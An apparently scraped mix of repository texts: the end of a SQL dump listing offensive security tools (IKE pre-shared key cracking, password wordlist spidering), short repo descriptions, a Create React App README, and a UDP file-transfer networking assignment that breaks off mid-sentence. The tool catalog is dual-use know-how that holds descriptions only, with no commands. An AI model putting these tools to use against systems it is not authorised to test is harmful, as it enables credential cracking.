IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
upbound / Platform Ref AwsAWS Reference Platform for Kubernetes + Data Services for use as a starting point in upbound.io to build, run, and operate your own internal cloud platform and offer a self-service console and API to your internal teams.
rramatchandran / Big O Performance Java# big-o-performance A simple html app to demonstrate performance costs of data structures. - Clone the project - Navigate to the root of the project in a termina or command prompt - Run 'npm install' - Run 'npm start' - Go to the URL specified in the terminal or command prompt to try out the app. # This app was created from the Create React App NPM. Below are instructions from that project. Below you will find some information on how to perform common tasks. You can find the most recent version of this guide [here](https://github.com/facebookincubator/create-react-app/blob/master/template/README.md). ## Table of Contents - [Updating to New Releases](#updating-to-new-releases) - [Sending Feedback](#sending-feedback) - [Folder Structure](#folder-structure) - [Available Scripts](#available-scripts) - [npm start](#npm-start) - [npm run build](#npm-run-build) - [npm run eject](#npm-run-eject) - [Displaying Lint Output in the Editor](#displaying-lint-output-in-the-editor) - [Installing a Dependency](#installing-a-dependency) - [Importing a Component](#importing-a-component) - [Adding a Stylesheet](#adding-a-stylesheet) - [Post-Processing CSS](#post-processing-css) - [Adding Images and Fonts](#adding-images-and-fonts) - [Adding Bootstrap](#adding-bootstrap) - [Adding Flow](#adding-flow) - [Adding Custom Environment Variables](#adding-custom-environment-variables) - [Integrating with a Node Backend](#integrating-with-a-node-backend) - [Proxying API Requests in Development](#proxying-api-requests-in-development) - [Deployment](#deployment) - [Now](#now) - [Heroku](#heroku) - [Surge](#surge) - [GitHub Pages](#github-pages) - [Something Missing?](#something-missing) ## Updating to New Releases Create React App is divided into two packages: * `create-react-app` is a global command-line utility that you use to create new projects. * `react-scripts` is a development dependency in the generated projects (including this one). You almost never need to update `create-react-app` itself: it’s delegates all the setup to `react-scripts`. When you run `create-react-app`, it always creates the project with the latest version of `react-scripts` so you’ll get all the new features and improvements in newly created apps automatically. To update an existing project to a new version of `react-scripts`, [open the changelog](https://github.com/facebookincubator/create-react-app/blob/master/CHANGELOG.md), find the version you’re currently on (check `package.json` in this folder if you’re not sure), and apply the migration instructions for the newer versions. In most cases bumping the `react-scripts` version in `package.json` and running `npm install` in this folder should be enough, but it’s good to consult the [changelog](https://github.com/facebookincubator/create-react-app/blob/master/CHANGELOG.md) for potential breaking changes. We commit to keeping the breaking changes minimal so you can upgrade `react-scripts` painlessly. ## Sending Feedback We are always open to [your feedback](https://github.com/facebookincubator/create-react-app/issues). ## Folder Structure After creation, your project should look like this: ``` my-app/ README.md index.html favicon.ico node_modules/ package.json src/ App.css App.js index.css index.js logo.svg ``` For the project to build, **these files must exist with exact filenames**: * `index.html` is the page template; * `favicon.ico` is the icon you see in the browser tab; * `src/index.js` is the JavaScript entry point. You can delete or rename the other files. You may create subdirectories inside `src`. For faster rebuilds, only files inside `src` are processed by Webpack. You need to **put any JS and CSS files inside `src`**, or Webpack won’t see them. You can, however, create more top-level directories. They will not be included in the production build so you can use them for things like documentation. ## Available Scripts In the project directory, you can run: ### `npm start` Runs the app in the development mode.<br> Open [http://localhost:3000](http://localhost:3000) to view it in the browser. The page will reload if you make edits.<br> You will also see any lint errors in the console. ### `npm run build` Builds the app for production to the `build` folder.<br> It correctly bundles React in production mode and optimizes the build for the best performance. The build is minified and the filenames include the hashes.<br> Your app is ready to be deployed! ### `npm run eject` **Note: this is a one-way operation. Once you `eject`, you can’t go back!** If you aren’t satisfied with the build tool and configuration choices, you can `eject` at any time. This command will remove the single build dependency from your project. Instead, it will copy all the configuration files and the transitive dependencies (Webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except `eject` will still work, but they will point to the copied scripts so you can tweak them. At this point you’re on your own. You don’t have to ever use `eject`. The curated feature set is suitable for small and middle deployments, and you shouldn’t feel obligated to use this feature. However we understand that this tool wouldn’t be useful if you couldn’t customize it when you are ready for it. ## Displaying Lint Output in the Editor >Note: this feature is available with `react-scripts@0.2.0` and higher. Some editors, including Sublime Text, Atom, and Visual Studio Code, provide plugins for ESLint. They are not required for linting. You should see the linter output right in your terminal as well as the browser console. However, if you prefer the lint results to appear right in your editor, there are some extra steps you can do. You would need to install an ESLint plugin for your editor first. >**A note for Atom `linter-eslint` users** >If you are using the Atom `linter-eslint` plugin, make sure that **Use global ESLint installation** option is checked: ><img src="http://i.imgur.com/yVNNHJM.png" width="300"> Then make sure `package.json` of your project ends with this block: ```js { // ... "eslintConfig": { "extends": "./node_modules/react-scripts/config/eslint.js" } } ``` Projects generated with `react-scripts@0.2.0` and higher should already have it. If you don’t need ESLint integration with your editor, you can safely delete those three lines from your `package.json`. Finally, you will need to install some packages *globally*: ```sh npm install -g eslint babel-eslint eslint-plugin-react eslint-plugin-import eslint-plugin-jsx-a11y eslint-plugin-flowtype ``` We recognize that this is suboptimal, but it is currently required due to the way we hide the ESLint dependency. The ESLint team is already [working on a solution to this](https://github.com/eslint/eslint/issues/3458) so this may become unnecessary in a couple of months. ## Installing a Dependency The generated project includes React and ReactDOM as dependencies. It also includes a set of scripts used by Create React App as a development dependency. You may install other dependencies (for example, React Router) with `npm`: ``` npm install --save <library-name> ``` ## Importing a Component This project setup supports ES6 modules thanks to Babel. While you can still use `require()` and `module.exports`, we encourage you to use [`import` and `export`](http://exploringjs.com/es6/ch_modules.html) instead. For example: ### `Button.js` ```js import React, { Component } from 'react'; class Button extends Component { render() { // ... } } export default Button; // Don’t forget to use export default! ``` ### `DangerButton.js` ```js import React, { Component } from 'react'; import Button from './Button'; // Import a component from another file class DangerButton extends Component { render() { return <Button color="red" />; } } export default DangerButton; ``` Be aware of the [difference between default and named exports](http://stackoverflow.com/questions/36795819/react-native-es-6-when-should-i-use-curly-braces-for-import/36796281#36796281). It is a common source of mistakes. We suggest that you stick to using default imports and exports when a module only exports a single thing (for example, a component). That’s what you get when you use `export default Button` and `import Button from './Button'`. Named exports are useful for utility modules that export several functions. A module may have at most one default export and as many named exports as you like. Learn more about ES6 modules: * [When to use the curly braces?](http://stackoverflow.com/questions/36795819/react-native-es-6-when-should-i-use-curly-braces-for-import/36796281#36796281) * [Exploring ES6: Modules](http://exploringjs.com/es6/ch_modules.html) * [Understanding ES6: Modules](https://leanpub.com/understandinges6/read#leanpub-auto-encapsulating-code-with-modules) ## Adding a Stylesheet This project setup uses [Webpack](https://webpack.github.io/) for handling all assets. Webpack offers a custom way of “extending” the concept of `import` beyond JavaScript. To express that a JavaScript file depends on a CSS file, you need to **import the CSS from the JavaScript file**: ### `Button.css` ```css .Button { padding: 20px; } ``` ### `Button.js` ```js import React, { Component } from 'react'; import './Button.css'; // Tell Webpack that Button.js uses these styles class Button extends Component { render() { // You can use them as regular CSS styles return <div className="Button" />; } } ``` **This is not required for React** but many people find this feature convenient. You can read about the benefits of this approach [here](https://medium.com/seek-ui-engineering/block-element-modifying-your-javascript-components-d7f99fcab52b). However you should be aware that this makes your code less portable to other build tools and environments than Webpack. In development, expressing dependencies this way allows your styles to be reloaded on the fly as you edit them. In production, all CSS files will be concatenated into a single minified `.css` file in the build output. If you are concerned about using Webpack-specific semantics, you can put all your CSS right into `src/index.css`. It would still be imported from `src/index.js`, but you could always remove that import if you later migrate to a different build tool. ## Post-Processing CSS This project setup minifies your CSS and adds vendor prefixes to it automatically through [Autoprefixer](https://github.com/postcss/autoprefixer) so you don’t need to worry about it. For example, this: ```css .App { display: flex; flex-direction: row; align-items: center; } ``` becomes this: ```css .App { display: -webkit-box; display: -ms-flexbox; display: flex; -webkit-box-orient: horizontal; -webkit-box-direction: normal; -ms-flex-direction: row; flex-direction: row; -webkit-box-align: center; -ms-flex-align: center; align-items: center; } ``` There is currently no support for preprocessors such as Less, or for sharing variables across CSS files. ## Adding Images and Fonts With Webpack, using static assets like images and fonts works similarly to CSS. You can **`import` an image right in a JavaScript module**. This tells Webpack to include that image in the bundle. Unlike CSS imports, importing an image or a font gives you a string value. This value is the final image path you can reference in your code. Here is an example: ```js import React from 'react'; import logo from './logo.png'; // Tell Webpack this JS file uses this image console.log(logo); // /logo.84287d09.png function Header() { // Import result is the URL of your image return <img src={logo} alt="Logo" />; } export default function Header; ``` This works in CSS too: ```css .Logo { background-image: url(./logo.png); } ``` Webpack finds all relative module references in CSS (they start with `./`) and replaces them with the final paths from the compiled bundle. If you make a typo or accidentally delete an important file, you will see a compilation error, just like when you import a non-existent JavaScript module. The final filenames in the compiled bundle are generated by Webpack from content hashes. If the file content changes in the future, Webpack will give it a different name in production so you don’t need to worry about long-term caching of assets. Please be advised that this is also a custom feature of Webpack. **It is not required for React** but many people enjoy it (and React Native uses a similar mechanism for images). However it may not be portable to some other environments, such as Node.js and Browserify. If you prefer to reference static assets in a more traditional way outside the module system, please let us know [in this issue](https://github.com/facebookincubator/create-react-app/issues/28), and we will consider support for this. ## Adding Bootstrap You don’t have to use [React Bootstrap](https://react-bootstrap.github.io) together with React but it is a popular library for integrating Bootstrap with React apps. If you need it, you can integrate it with Create React App by following these steps: Install React Bootstrap and Bootstrap from NPM. React Bootstrap does not include Bootstrap CSS so this needs to be installed as well: ``` npm install react-bootstrap --save npm install bootstrap@3 --save ``` Import Bootstrap CSS and optionally Bootstrap theme CSS in the ```src/index.js``` file: ```js import 'bootstrap/dist/css/bootstrap.css'; import 'bootstrap/dist/css/bootstrap-theme.css'; ``` Import required React Bootstrap components within ```src/App.js``` file or your custom component files: ```js import { Navbar, Jumbotron, Button } from 'react-bootstrap'; ``` Now you are ready to use the imported React Bootstrap components within your component hierarchy defined in the render method. Here is an example [`App.js`](https://gist.githubusercontent.com/gaearon/85d8c067f6af1e56277c82d19fd4da7b/raw/6158dd991b67284e9fc8d70b9d973efe87659d72/App.js) redone using React Bootstrap. ## Adding Flow Flow typing is currently [not supported out of the box](https://github.com/facebookincubator/create-react-app/issues/72) with the default `.flowconfig` generated by Flow. If you run it, you might get errors like this: ```js node_modules/fbjs/lib/Deferred.js.flow:60 60: Promise.prototype.done.apply(this._promise, arguments); ^^^^ property `done`. Property not found in 495: declare class Promise<+R> { ^ Promise. See lib: /private/tmp/flow/flowlib_34952d31/core.js:495 node_modules/fbjs/lib/shallowEqual.js.flow:29 29: return x !== 0 || 1 / (x: $FlowIssue) === 1 / (y: $FlowIssue); ^^^^^^^^^^ identifier `$FlowIssue`. Could not resolve name src/App.js:3 3: import logo from './logo.svg'; ^^^^^^^^^^^^ ./logo.svg. Required module not found src/App.js:4 4: import './App.css'; ^^^^^^^^^^^ ./App.css. Required module not found src/index.js:5 5: import './index.css'; ^^^^^^^^^^^^^ ./index.css. Required module not found ``` To fix this, change your `.flowconfig` to look like this: ```ini [libs] ./node_modules/fbjs/flow/lib [options] esproposal.class_static_fields=enable esproposal.class_instance_fields=enable module.name_mapper='^\(.*\)\.css$' -> 'react-scripts/config/flow/css' module.name_mapper='^\(.*\)\.\(jpg\|png\|gif\|eot\|otf\|webp\|svg\|ttf\|woff\|woff2\|mp4\|webm\)$' -> 'react-scripts/config/flow/file' suppress_type=$FlowIssue suppress_type=$FlowFixMe ``` Re-run flow, and you shouldn’t get any extra issues. If you later `eject`, you’ll need to replace `react-scripts` references with the `<PROJECT_ROOT>` placeholder, for example: ```ini module.name_mapper='^\(.*\)\.css$' -> '<PROJECT_ROOT>/config/flow/css' module.name_mapper='^\(.*\)\.\(jpg\|png\|gif\|eot\|otf\|webp\|svg\|ttf\|woff\|woff2\|mp4\|webm\)$' -> '<PROJECT_ROOT>/config/flow/file' ``` We will consider integrating more tightly with Flow in the future so that you don’t have to do this. ## Adding Custom Environment Variables >Note: this feature is available with `react-scripts@0.2.3` and higher. Your project can consume variables declared in your environment as if they were declared locally in your JS files. By default you will have `NODE_ENV` defined for you, and any other environment variables starting with `REACT_APP_`. These environment variables will be defined for you on `process.env`. For example, having an environment variable named `REACT_APP_SECRET_CODE` will be exposed in your JS as `process.env.REACT_APP_SECRET_CODE`, in addition to `process.env.NODE_ENV`. These environment variables can be useful for displaying information conditionally based on where the project is deployed or consuming sensitive data that lives outside of version control. First, you need to have environment variables defined, which can vary between OSes. For example, let's say you wanted to consume a secret defined in the environment inside a `<form>`: ```jsx render() { return ( <div> <small>You are running this application in <b>{process.env.NODE_ENV}</b> mode.</small> <form> <input type="hidden" defaultValue={process.env.REACT_APP_SECRET_CODE} /> </form> </div> ); } ``` The above form is looking for a variable called `REACT_APP_SECRET_CODE` from the environment. In order to consume this value, we need to have it defined in the environment: ### Windows (cmd.exe) ```cmd set REACT_APP_SECRET_CODE=abcdef&&npm start ``` (Note: the lack of whitespace is intentional.) ### Linux, OS X (Bash) ```bash REACT_APP_SECRET_CODE=abcdef npm start ``` > Note: Defining environment variables in this manner is temporary for the life of the shell session. Setting permanent environment variables is outside the scope of these docs. With our environment variable defined, we start the app and consume the values. Remember that the `NODE_ENV` variable will be set for you automatically. When you load the app in the browser and inspect the `<input>`, you will see its value set to `abcdef`, and the bold text will show the environment provided when using `npm start`: ```html <div> <small>You are running this application in <b>development</b> mode.</small> <form> <input type="hidden" value="abcdef" /> </form> </div> ``` Having access to the `NODE_ENV` is also useful for performing actions conditionally: ```js if (process.env.NODE_ENV !== 'production') { analytics.disable(); } ``` ## Integrating with a Node Backend Check out [this tutorial](https://www.fullstackreact.com/articles/using-create-react-app-with-a-server/) for instructions on integrating an app with a Node backend running on another port, and using `fetch()` to access it. You can find the companion GitHub repository [here](https://github.com/fullstackreact/food-lookup-demo). ## Proxying API Requests in Development >Note: this feature is available with `react-scripts@0.2.3` and higher. People often serve the front-end React app from the same host and port as their backend implementation. For example, a production setup might look like this after the app is deployed: ``` / - static server returns index.html with React app /todos - static server returns index.html with React app /api/todos - server handles any /api/* requests using the backend implementation ``` Such setup is **not** required. However, if you **do** have a setup like this, it is convenient to write requests like `fetch('/api/todos')` without worrying about redirecting them to another host or port during development. To tell the development server to proxy any unknown requests to your API server in development, add a `proxy` field to your `package.json`, for example: ```js "proxy": "http://localhost:4000", ``` This way, when you `fetch('/api/todos')` in development, the development server will recognize that it’s not a static asset, and will proxy your request to `http://localhost:4000/api/todos` as a fallback. Conveniently, this avoids [CORS issues](http://stackoverflow.com/questions/21854516/understanding-ajax-cors-and-security-considerations) and error messages like this in development: ``` Fetch API cannot load http://localhost:4000/api/todos. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost:3000' is therefore not allowed access. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled. ``` Keep in mind that `proxy` only has effect in development (with `npm start`), and it is up to you to ensure that URLs like `/api/todos` point to the right thing in production. You don’t have to use the `/api` prefix. Any unrecognized request will be redirected to the specified `proxy`. Currently the `proxy` option only handles HTTP requests, and it won’t proxy WebSocket connections. If the `proxy` option is **not** flexible enough for you, alternatively you can: * Enable CORS on your server ([here’s how to do it for Express](http://enable-cors.org/server_expressjs.html)). * Use [environment variables](#adding-custom-environment-variables) to inject the right server host and port into your app. ## Deployment By default, Create React App produces a build assuming your app is hosted at the server root. To override this, specify the `homepage` in your `package.json`, for example: ```js "homepage": "http://mywebsite.com/relativepath", ``` This will let Create React App correctly infer the root path to use in the generated HTML file. ### Now See [this example](https://github.com/xkawi/create-react-app-now) for a zero-configuration single-command deployment with [now](https://zeit.co/now). ### Heroku Use the [Heroku Buildpack for Create React App](https://github.com/mars/create-react-app-buildpack). You can find instructions in [Deploying React with Zero Configuration](https://blog.heroku.com/deploying-react-with-zero-configuration). ### Surge Install the Surge CLI if you haven't already by running `npm install -g surge`. Run the `surge` command and log in you or create a new account. You just need to specify the *build* folder and your custom domain, and you are done. ```sh email: email@domain.com password: ******** project path: /path/to/project/build size: 7 files, 1.8 MB domain: create-react-app.surge.sh upload: [====================] 100%, eta: 0.0s propagate on CDN: [====================] 100% plan: Free users: email@domain.com IP Address: X.X.X.X Success! Project is published and running at create-react-app.surge.sh ``` Note that in order to support routers that use html5 `pushState` API, you may want to rename the `index.html` in your build folder to `200.html` before deploying to Surge. This [ensures that every URL falls back to that file](https://surge.sh/help/adding-a-200-page-for-client-side-routing). ### GitHub Pages >Note: this feature is available with `react-scripts@0.2.0` and higher. Open your `package.json` and add a `homepage` field: ```js "homepage": "http://myusername.github.io/my-app", ``` **The above step is important!** Create React App uses the `homepage` field to determine the root URL in the built HTML file. Now, whenever you run `npm run build`, you will see a cheat sheet with a sequence of commands to deploy to GitHub pages: ```sh git commit -am "Save local changes" git checkout -B gh-pages git add -f build git commit -am "Rebuild website" git filter-branch -f --prune-empty --subdirectory-filter build git push -f origin gh-pages git checkout - ``` You may copy and paste them, or put them into a custom shell script. You may also customize them for another hosting provider. Note that GitHub Pages doesn't support routers that use the HTML5 `pushState` history API under the hood (for example, React Router using `browserHistory`). This is because when there is a fresh page load for a url like `http://user.github.io/todomvc/todos/42`, where `/todos/42` is a frontend route, the GitHub Pages server returns 404 because it knows nothing of `/todos/42`. If you want to add a router to a project hosted on GitHub Pages, here are a couple of solutions: * You could switch from using HTML5 history API to routing with hashes. If you use React Router, you can switch to `hashHistory` for this effect, but the URL will be longer and more verbose (for example, `http://user.github.io/todomvc/#/todos/42?_k=yknaj`). [Read more](https://github.com/reactjs/react-router/blob/master/docs/guides/Histories.md#histories) about different history implementations in React Router. * Alternatively, you can use a trick to teach GitHub Pages to handle 404 by redirecting to your `index.html` page with a special redirect parameter. You would need to add a `404.html` file with the redirection code to the `build` folder before deploying your project, and you’ll need to add code handling the redirect parameter to `index.html`. You can find a detailed explanation of this technique [in this guide](https://github.com/rafrex/spa-github-pages). ## Something Missing? If you have ideas for more “How To” recipes that should be on this page, [let us know](https://github.com/facebookincubator/create-react-app/issues) or [contribute some!](https://github.com/facebookincubator/create-react-app/edit/master/template/README.md)
syednadeembe / Project SessionsThese sessions will help you implement real world devops projects and act as a focul point of reference.
SOYJUN / FTP Implement Based On UDPThe aim of this assignment is to have you do UDP socket client / server programming with a focus on two broad aspects : Setting up the exchange between the client and server in a secure way despite the lack of a formal connection (as in TCP) between the two, so that ‘outsider’ UDP datagrams (broadcast, multicast, unicast - fortuitously or maliciously) cannot intrude on the communication. Introducing application-layer protocol data-transmission reliability, flow control and congestion control in the client and server using TCP-like ARQ sliding window mechanisms. The second item above is much more of a challenge to implement than the first, though neither is particularly trivial. But they are not tightly interdependent; each can be worked on separately at first and then integrated together at a later stage. Apart from the material in Chapters 8, 14 & 22 (especially Sections 22.5 - 22.7), and the experience you gained from the preceding assignment, you will also need to refer to the following : ioctl function (Chapter 17). get_ifi_info function (Section 17.6, Chapter 17). This function will be used by the server code to discover its node’s network interfaces so that it can bind all its interface IP addresses (see Section 22.6). ‘Race’ conditions (Section 20.5, Chapter 20) You also need a thorough understanding of how the TCP protocol implements reliable data transfer, flow control and congestion control. Chapters 17- 24 of TCP/IP Illustrated, Volume 1 by W. Richard Stevens gives a good overview of TCP. Though somewhat dated for some things (it was published in 1994), it remains, overall, a good basic reference. Overview This assignment asks you to implement a primitive file transfer protocol for Unix platforms, based on UDP, and with TCP-like reliability added to the transfer operation using timeouts and sliding-window mechanisms, and implementing flow and congestion control. The server is a concurrent server which can handle multiple clients simultaneously. A client gives the server the name of a file. The server forks off a child which reads directly from the file and transfers the contents over to the client using UDP datagrams. The client prints out the file contents as they come in, in order, with nothing missing and with no duplication of content, directly on to stdout (via the receiver sliding window, of course, but with no other intermediate buffering). The file to be transferred can be of arbitrary length, but its contents are always straightforward ascii text. As an aside let me mention that assuming the file contents ascii is not as restrictive as it sounds. We can always pretend, for example, that binary files are base64 encoded (“ASCII armor”). A real file transfer protocol would, of course, have to worry about transferring files between heterogeneous platforms with different file structure conventions and semantics. The sender would first have to transform the file into a platform-independent, protocol-defined, format (using, say, ASN.1, or some such standard), and the receiver would have to transform the received file into its platform’s native file format. This kind of thing can be fairly time consuming, and is certainly very tedious, to implement, with little educational value - it is not part of this assignment. Arguments for the server You should provide the server with an input file server.in from which it reads the following information, in the order shown, one item per line : Well-known port number for server. Maximum sending sliding-window size (in datagram units). You will not be handing in your server.in file. We shall create our own when we come to test your code. So it is important that you stick strictly to the file name and content conventions specified above. The same applies to the client.in input file below. Arguments for the client The client is to be provided with an input file client.in from which it reads the following information, in the order shown, one item per line : IP address of server (not the hostname). Well-known port number of server. filename to be transferred. Receiving sliding-window size (in datagram units). Random generator seed value. Probability p of datagram loss. This should be a real number in the range [ 0.0 , 1.0 ] (value 0.0 means no loss occurs; value 1.0 means all datagrams all lost). The mean µ, in milliseconds, for an exponential distribution controlling the rate at which the client reads received datagram payloads from its receive buffer. Operation Server starts up and reads its arguments from file server.in. As we shall see, when a client communicates with the server, the server will want to know what IP address that client is using to identify the server (i.e. , the destination IP address in the incoming datagram). Normally, this can be done relatively straightforwardly using the IP_RECVDESTADDR socket option, and picking up the information using the ancillary data (‘control information’) capability of the recvmsg function. Unfortunately, Solaris 2.10 does not support the IP_RECVDESTADDR option (nor, incidentally, does it support the msg_flags option in msghdr - see p.390). This considerably complicates things. In the absence of IP_RECVDESTADDR, what the server has to do as part of its initialization phase is to bind each IP address it has (and, simultaneously, its well-known port number, which it has read in from server.in) to a separate UDP socket. The code in Section 22.6, which uses the get_ifi_info function, shows you how to do that. However, there are important differences between that code and the version you want to implement. The code of Section 22.6 binds the IP addresses and forks off a child for each address that is bound to. We do not want to do that. Instead you should have an array of socket descriptors. For each IP address, create a new socket and bind the address (and well-known port number) to the socket without forking off child processes. Creating child processes comes later, when clients arrive. The code of Section 22.6 also attempts to bind broadcast addresses. We do not want to do this. It binds a wildcard IP address, which we certainly do not want to do either. We should bind strictly only unicast addresses (including the loopback address). The get_ifi_info function (which the code in Section 22.6 uses) has to be modified so that it also gets the network masks for the IP addresses of the node, and adds these to the information stored in the linked list of ifi_info structures (see Figure 17.5, p.471) it produces. As you go binding each IP address to a distinct socket, it will be useful for later processing to build your own array of structures, where a structure element records the following information for each socket : sockfd IP address bound to the socket network mask for the IP address subnet address (obtained by doing a bit-wise and between the IP address and its network mask) Report, in a ReadMe file which you hand in with your code, on the modifications you had to introduce to ensure that only unicast addresses are bound, and on your implementation of the array of structures described above. You should print out on stdout, with an appropriate message and appropriately formatted in dotted decimal notation, the IP address, network mask, and subnet address for each socket in your array of structures (you do not need to print the sockfd). The server now uses select to monitor the sockets it has created for incoming datagrams. When it returns from select, it must use recvfrom or recvmsg to read the incoming datagram (see 6. below). When a client starts, it first reads its arguments from the file client.in. The client checks if the server host is ‘local’ to its (extended) Ethernet. If so, all its communication to the server is to occur as MSG_DONTROUTE (or SO_DONTROUTE socket option). It determines if the server host is ‘local’ as follows. The first thing the client should do is to use the modified get_ifi_info function to obtain all of its IP addresses and associated network masks. Print out on stdout, in dotted decimal notation and with an appropriate message, the IP addresses and network masks obtained. In the following, IPserver designates the IP address the client will use to identify the server, and IPclient designates the IP address the client will choose to identify itself. The client checks whether the server is on the same host. If so, it should use the loopback address 127.0.0.1 for the server (i.e. , IPserver = 127.0.0.1). IPclient should also be set to the loopback address. Otherwise it proceeds as follows: IPserver is set to the IP address for the server in the client.in file. Given IPserver and the (unicast) IP addresses and network masks for the client returned by get_ifi_info in the linked list of ifi_info structures, you should be able to figure out if the server node is ‘local’ or not. This will be discussed in class; but let me just remind you here that you should use ‘longest prefix matching’ where applicable. If there are multiple client addresses, and the server host is ‘local’, the client chooses an IP address for itself, IPclient, which matches up as ‘local’ according to your examination above. If the server host is not ‘local’, then IPclient can be chosen arbitrarily. Print out on stdout the results of your examination, as to whether the server host is ‘local’ or not, as well as the IPclient and IPserver addresses selected. Note that this manner of determining whether the server is local or not is somewhat clumsy and ‘over-engineered’, and, as such, should be viewed more in the nature of a pedagogical exercise. Ideally, we would like to look up the server IP address(es) in the routing table (see Section 18.3). This requires that a routing socket be created, for which we need superuser privilege. Alternatively, we might want to dump out the routing table, using the sysctl function for example (see Section 18.4), and examine it directly. Unfortunately, Solaris 2.10 does not support sysctl. Furthermore, note that there is a slight problem with the address 130.245.1.123/24 assigned to compserv3 (see rightmost column of file hosts, and note that this particular compserv3 address “overlaps” with the 130.245.1.x/28 addresses in that same column assigned to compserv1, compserv2 & comserv4). In particular, if the client is running on compserv3 and the server on any of the other three compservs, and if that server node is also being identified to the client by its /28 (rather than its /24) address, then the client will get a “false positive” when it tests as to whether the server node is local or not. In other words, the client will deem the server node to be local, whereas in fact it should not be considered local. Because of this, it is perhaps best simply not to use compserv3 to run the client (but it is o.k. to use it to run the server). Finally, using MSG_DONTROUTE where possible would seem to gain us efficiency, in as much as the kernel does not need to consult the routing table for every datagram sent. But, in fact, that is not so. Recall that one effect of connect with UDP sockets is that routing information is obtained by the kernel at the time the connect is issued. That information is cached and used for subsequent sends from the connected socket (see p.255). The client now creates a UDP socket and calls bind on IPclient, with 0 as the port number. This will cause the kernel to bind an ephemeral port to the socket. After the bind, use the getsockname function (Section 4.10) to obtain IPclient and the ephemeral port number that has been assigned to the socket, and print that information out on stdout, with an appropriate message and appropriately formatted. The client connects its socket to IPserver and the well-known port number of the server. After the connect, use the getpeername function (Section 4.10) to obtain IPserver and the well-known port number of the server, and print that information out on stdout, with an appropriate message and appropriately formatted. The client sends a datagram to the server giving the filename for the transfer. This send needs to be backed up by a timeout in case the datagram is lost. Note that the incoming datagram from the client will be delivered to the server at the socket to which the destination IP address that the datagram is carrying has been bound. Thus, the server can obtain that address (it is, of course, IPserver) and thereby achieve what IP_RECVDESTADDR would have given us had it been available. Furthermore, the server process can obtain the IP address (this will, of course, be IPclient) and ephemeral port number of the client through the recvfrom or recvmsg functions. The server forks off a child process to handle the client. The server parent process goes back to the select to listen for new clients. Hereafter, and unless otherwise stated, whenever we refer to the ‘server’, we mean the server child process handling the client’s file transfer, not the server parent process. Typically, the first thing the server child would be expected to do is to close all sockets it ‘inherits’ from its parent. However, this is not the case with us. The server child does indeed close the sockets it inherited, but not the socket on which the client request arrived. It leaves that socket open for now. Call this socket the ‘listening’ socket. The server (child) then checks if the client host is local to its (extended) Ethernet. If so, all its communication to the client is to occur as MSG_DONTROUTE (or SO_DONTROUTE socket option). If IPserver (obtained in 5. above) is the loopback address, then we are done. Otherwise, the server has to proceed with the following step. Use the array of structures you built in 1. above, together with the addresses IPserver and IPclient to determine if the client is ‘local’. Print out on stdout the results of your examination, as to whether the client host is ‘local’ or not. The server (child) creates a UDP socket to handle file transfer to the client. Call this socket the ‘connection’ socket. It binds the socket to IPserver, with port number 0 so that its kernel assigns an ephemeral port. After the bind, use the getsockname function (Section 4.10) to obtain IPserver and the ephemeral port number that has been assigned to the socket, and print that information out on stdout, with an appropriate message and appropriately formatted. The server then connects this ‘connection’ socket to the client’s IPclient and ephemeral port number. The server now sends the client a datagram, in which it passes it the ephemeral port number of its ‘connection’ socket as the data payload of the datagram. This datagram is sent using the ‘listening’ socket inherited from its parent, otherwise the client (whose socket is connected to the server’s ‘listening’ socket at the latter’s well-known port number) will reject it. This datagram must be backed up by the ARQ mechanism, and retransmitted in the event of loss. Note that if this datagram is indeed lost, the client might well time out and retransmit its original request message (the one carrying the file name). In this event, you must somehow ensure that the parent server does not mistake this retransmitted request for a new client coming in, and spawn off yet another child to handle it. How do you do that? It is potentially more involved than it might seem. I will be discussing this in class, as well as ‘race’ conditions that could potentially arise, depending on how you code the mechanisms I present. When the client receives the datagram carrying the ephemeral port number of the server’s ‘connection’ socket, it reconnects its socket to the server’s ‘connection’ socket, using IPserver and the ephemeral port number received in the datagram (see p.254). It now uses this reconnected socket to send the server an acknowledgment. Note that this implies that, in the event of the server timing out, it should retransmit two copies of its ‘ephemeral port number’ message, one on its ‘listening’ socket and the other on its ‘connection’ socket (why?). When the server receives the acknowledgment, it closes the ‘listening’ socket it inherited from its parent. The server can now commence the file transfer through its ‘connection’ socket. The net effect of all these binds and connects at server and client is that no ‘outsider’ UDP datagram (broadcast, multicast, unicast - fortuitously or maliciously) can now intrude on the communication between server and client. Starting with the first datagram sent out, the client behaves as follows. Whenever a datagram arrives, or an ACK is about to be sent out (or, indeed, the initial datagram to the server giving the filename for the transfer), the client uses some random number generator function random() (initialized by the client.in argument value seed) to decide with probability p (another client.in argument value) if the datagram or ACK should be discarded by way of simulating transmission loss across the network. (I will briefly discuss in class how you do this.) Adding reliability to UDP The mechanisms you are to implement are based on TCP Reno. These include : Reliable data transmission using ARQ sliding-windows, with Fast Retransmit. Flow control via receiver window advertisements. Congestion control that implements : SlowStart Congestion Avoidance (‘Additive-Increase/Multiplicative Decrease’ – AIMD) Fast Recovery (but without the window-inflation aspect of Fast Recovery) Only some, and by no means all, of the details for these are covered below. The rest will be presented in class, especially those concerning flow control and TCP Reno’s congestion control mechanisms in general : Slow Start, Congestion Avoidance, Fast Retransmit and Fast Recovery. Implement a timeout mechanism on the sender (server) side. This is available to you from Stevens, Section 22.5 . Note, however, that you will need to modify the basic driving mechanism of Figure 22.7 appropriately since the situation at the sender side is not a repetitive cycle of send-receive, but rather a straightforward progression of send-send-send-send- . . . . . . . . . . . Also, modify the RTT and RTO mechanisms of Section 22.5 as specified below. I will be discussing the details of these modifications and the reasons for them in class. Modify function rtt_stop (Fig. 22.13) so that it uses integer arithmetic rather than floating point. This will entail your also having to modify some of the variable and function parameter declarations throughout Section 22.5 from float to int, as appropriate. In 